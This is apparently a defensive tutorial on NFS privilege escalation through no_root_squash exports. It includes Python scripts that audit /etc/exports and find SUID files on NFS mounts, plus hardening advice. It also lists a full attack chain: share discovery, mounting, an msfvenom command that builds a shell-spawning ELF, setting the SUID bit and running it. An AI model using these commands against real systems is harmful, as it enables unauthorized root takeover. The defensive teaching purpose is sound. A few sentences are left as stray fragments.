Privilege Escalation via Misconfigured NFS (Conceptual Overview)
Network File System (NFS) allows remote file sharing over a network. When misconfigured with insecure options, it can permit local privilege escalation by manipulating file ownership and permissions.
What is Network File System (NFS)?
NFS enables systems to share directories and files with remote clients, commonly used in enterprise environments for centralized storage.
Security depends heavily on export configurations and client mounting options.
How NFS-Based Escalation Happens (High-Level)
- NFS exports are configured with insecure flags
- A client mounts an export on which root_squash has been disabled
- A user creates SUID/SGID binaries on the mounted share
- Executing those binaries on a host where the share is mounted triggers privilege escalation
root_squash and restricted exports.
Why NFS Misconfigurations Are Dangerous
- Bypasses local file permission models
- Allows remote SUID/SGID binary creation
- Can lead to full root compromise
- Often overlooked in security audits
Real-World Example (Defensive View)
An administrator exports a directory with no_root_squash for convenience, allowing the root user on any client to create files with root ownership on the share.
An attacker mounts the share, creates a SUID root shell, and gains elevated privileges.
no_root_squash should only be used in trusted, controlled environments.
Detecting Risky NFS Configurations
- Exports with no_root_squash
- World-readable/writable exports
- Unrestricted client access in exports
- Insecure NFS versions (v1, v2 without secure flags)
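The checks above can be run mechanically against the server's export table. The following is an added example for this page, not code from the original: a small parser for the exports(5) format (comments, backslash continuation lines, host(options) groups) that flags no_root_squash, the insecure option, wildcard or missing client lists, and writable exports that do not use Kerberos. SAMPLE_EXPORTS is a constructed configuration; /etc/exports is only the Linux default path and the script accepts any file as its first argument.

```python
"""Audit /etc/exports for settings that enable NFS-based privilege escalation.

Added example for this page, not code from the original; SAMPLE_EXPORTS is a
constructed configuration and /etc/exports is just the Linux default path.
"""
import re
import sys
from dataclasses import dataclass

# host(options) with nothing between host and "("; a bare "(options)" means
# the options apply to every host, which exports(5) explicitly warns about.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

SAMPLE_EXPORTS = """\
# constructed sample, not a real /etc/exports
/srv/scratch   *(rw,no_root_squash,sync)
/srv/data      192.0.2.10(rw,sync,no_subtree_check) \\
               192.0.2.11(ro,sync)
/srv/public    10.0.0.0/24 (rw)
/srv/secure    192.0.2.0/24(rw,root_squash,sync,no_subtree_check,sec=krb5p)
"""


@dataclass
class Finding:
    path: str
    client: str
    option: str
    reason: str


def _logical_lines(text):
    """Join backslash-continued lines and drop comments and blank lines."""
    buf = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            yield buf.strip()
        buf = ""
    if buf.strip():
        yield buf.strip()


def parse_exports(text):
    """Return [(path, [(host, [option, ...]), ...]), ...] for each export."""
    exports = []
    for line in _logical_lines(text):
        fields = line.split()
        path, clients = fields[0], []
        for spec in fields[1:]:
            m = CLIENT_RE.match(spec)
            host, opts = (m.groups() if m else (spec, None))
            clients.append((host, opts.split(",") if opts else []))
        exports.append((path, clients))
    return exports


def audit_exports(text):
    """Return a list of Findings; an empty list means nothing risky was seen."""
    findings = []
    for path, clients in parse_exports(text):
        if not clients:
            findings.append(Finding(path, "*", "-", "no client list: every host may mount"))
        for host, options in clients:
            who = host or "(everyone)"
            if host == "":
                findings.append(Finding(path, who, ",".join(options),
                                        "options separated from the host by a space apply to every host"))
            elif "*" in host or "?" in host:
                findings.append(Finding(path, who, "-", "wildcard client: any matching host may mount"))
            if "no_root_squash" in options:
                findings.append(Finding(path, who, "no_root_squash",
                                        "client root keeps uid 0; root-owned SUID files can be planted"))
            if "insecure" in options:
                findings.append(Finding(path, who, "insecure",
                                        "requests accepted from unprivileged source ports"))
            if "rw" in options and not any(o.startswith("sec=krb5") for o in options):
                findings.append(Finding(path, who, "sec=sys",
                                        "writable export without Kerberos: client-asserted uids are trusted"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    results = audit_exports(text)
    for f in results:
        print(f"{f.path:<14} {f.client:<14} {f.option:<16} {f.reason}")
    sys.exit(1 if results else 0)
```

Run it as `python3 audit_exports.py /etc/exports` on the server; a non-zero exit status makes it usable from a configuration-audit job. The /srv/public line in the sample shows the classic mistake the parser catches: a space before (rw) turns the options into a world export.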
Preventing NFS-Based Escalation
- Always use root_squash (the default)
- Restrict exports to specific IPs/networks
- Use NFSv4 with Kerberos authentication
- Regularly audit /etc/exports configurations
- Monitor for unauthorized mount attempts
Key Takeaways
- NFS misconfigurations can lead to privilege escalation
- no_root_squash is the primary risk factor
- Regular configuration audits are essential
- Network-level restrictions complement filesystem permissions
NFS Privilege Escalation: Command Awareness
Common commands observed during NFS security audits and investigations. Shown for defensive awareness and educational purposes only.
NFS Service Discovery
- Check for NFS services: rpcinfo -p [target_ip]
  Why used: Identify running RPC services, including NFS.
- List NFS shares (if allowed): showmount -e [target_ip]
  Why used: Discover exported directories. May be blocked by a firewall or restricted.
showmount -e should only work for authorized clients in secure setups.
Mount Operations (High Risk if Misconfigured)
- Create local mount point: mkdir /mnt/tmp
  Why used: Prepare a directory for mounting the remote NFS share.
- Mount NFS share (insecure example): mount -o rw,vers=3 [target_ip]:/tmp /mnt/tmp
  Why used: Mount the remote share locally. NFSv3 without secure options may preserve root ownership.
- Verify mount: mount | grep nfs
  Why used: Confirm the NFS mount succeeded and view its options.
Share Content Inspection
- Navigate to mount point: cd /mnt/tmp
  Why used: Access the mounted NFS share for inspection.
- List share contents: ls -al
  Why used: Examine files, ownership, and permissions on the mounted share.
Binary Creation (Critical Risk)
no_root_squash.
- Generate executable payload (example): msfvenom -p linux/x64/exec CMD="/bin/sh" -f elf -o shell.elf
  Why used: Create a standalone ELF executable that spawns a shell. In labs, this demonstrates payload generation concepts.
- Verify file creation: ls -al
  Why used: Confirm the payload exists and check its ownership/permissions.
- Set SUID bit (dangerous if misconfigured): chmod +xs ./shell.elf
  Why used: Make the executable run with the file owner's privileges. On an NFS export with no_root_squash, the file could be root-owned.
- Verify SUID bit set: ls -al
  Why used: Confirm SUID/SGID permissions are applied.
Execution Phase (Maximum Risk)
- Execute binary (example scenario): ./shell.elf
  Why used: If the binary is root-owned and SUID on a misconfigured NFS share, running it could escalate privileges.
Cleanup & Verification
- Unmount NFS share: umount /mnt/tmp
  Why used: Properly disconnect the mounted share.
- Remove mount point: rmdir /mnt/tmp
  Why used: Clean up the temporary directory.
- Check user identity: id
  Why used: Verify the current privilege level after tests.
Defensive NFS Commands
- Review NFS exports safely: cat /etc/exports
  Why used: Check the server-side NFS configuration for insecure options.
- Check currently mounted NFS shares: showmount -a localhost
  Why used: List clients connected to NFS shares (server-side).
- Find SUID binaries on NFS mounts: find /mnt -type f -perm -4000 2>/dev/null
  Why used: Audit for SUID binaries on mounted NFS shares.
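The find command above assumes every NFS mount lives under /mnt. The following is an added example for this page, not code from the original, that instead discovers NFS mounts from /proc/mounts, reports the ones mounted without nosuid (where a planted SUID file would actually take effect), and then walks each of them for SUID/SGID regular files using lstat so symlinks are never followed off the share. SAMPLE_PROC_MOUNTS is constructed; the real /proc/mounts on Linux has the same six-column layout.

```python
"""Client-side NFS checks: which NFS mounts honour SUID bits, and which files on
a share carry the SUID/SGID bit.

Added example for this page, not code from the original. SAMPLE_PROC_MOUNTS is
constructed; /proc/mounts on Linux has the same six-column layout.
"""
import os
import stat

NFS_FSTYPES = {"nfs", "nfs4"}

SAMPLE_PROC_MOUNTS = """\
192.0.2.5:/srv/data /mnt/data nfs4 rw,relatime,vers=4.2,sec=krb5p,nosuid,nodev 0 0
192.0.2.5:/srv/scratch /mnt/scratch nfs rw,relatime,vers=3,sec=sys,addr=192.0.2.5 0 0
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
"""


def parse_proc_mounts(text):
    """Yield (device, mountpoint, fstype, options) for each /proc/mounts line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        device, mountpoint, fstype, opts = fields[:4]
        # the kernel escapes whitespace in paths as octal, e.g. "\040" for a space
        mountpoint = mountpoint.replace("\\040", " ")
        yield device, mountpoint, fstype, set(opts.split(","))


def nfs_mounts_allowing_suid(text):
    """NFS mountpoints mounted without nosuid: SUID/SGID bits on them take effect."""
    return [mp for _, mp, fstype, opts in parse_proc_mounts(text)
            if fstype in NFS_FSTYPES and "nosuid" not in opts]


def find_setid_files(root):
    """Return (path, mode, uid) for regular files under root with SUID or SGID set.

    Uses lstat so symlinks pointing off the share are never followed."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return hits


if __name__ == "__main__":
    if os.path.exists("/proc/mounts"):
        mounts_text = open("/proc/mounts").read()
    else:
        mounts_text = SAMPLE_PROC_MOUNTS
    for mp in nfs_mounts_allowing_suid(mounts_text):
        print(f"{mp}: NFS mount without nosuid")
        for path, mode, uid in find_setid_files(mp):
            print(f"  setid file {path} mode {mode} uid {uid}")
```

Any mountpoint the script prints is one where adding nosuid (and nodev) to the client's mount options closes the execution half of the attack regardless of what the server exports; a root-owned setid file that still shows up is then an audit finding for the export side.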
NFS Security Hardening
- Secure /etc/exports example: /shared/data client_ip(rw,root_squash,sync,no_subtree_check)
  Why used: Example of a secure NFS export with root_squash enabled and the client pinned to a single address.
- Disable insecure NFS versions: in /etc/nfs.conf, set vers2=n and vers3=n under the [nfsd] section (equivalently, pass -N 2 -N 3 to rpc.nfsd), then restart the NFS server
  Why used: Disable NFS v2/v3 if they are not needed. Note that NEED_SVCGSSD in /etc/default/nfs-common controls the rpc.svcgssd Kerberos daemon, not protocol versions, so setting it to no would weaken rather than harden the server.
root_squash and restrict exports to specific IP addresses.
Security References
- NFS Security Best Practices: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/storage_administration_guide/nfs-security
- CIS Benchmarks for NFS: https://www.cisecurity.org/benchmark/linux
Defender Takeaways
- Audit /etc/exports regularly
- Ensure root_squash is enabled
- Restrict exports to specific IPs/networks
- Monitor for unauthorized mount attempts
- Scan NFS shares for SUID/SGID binaries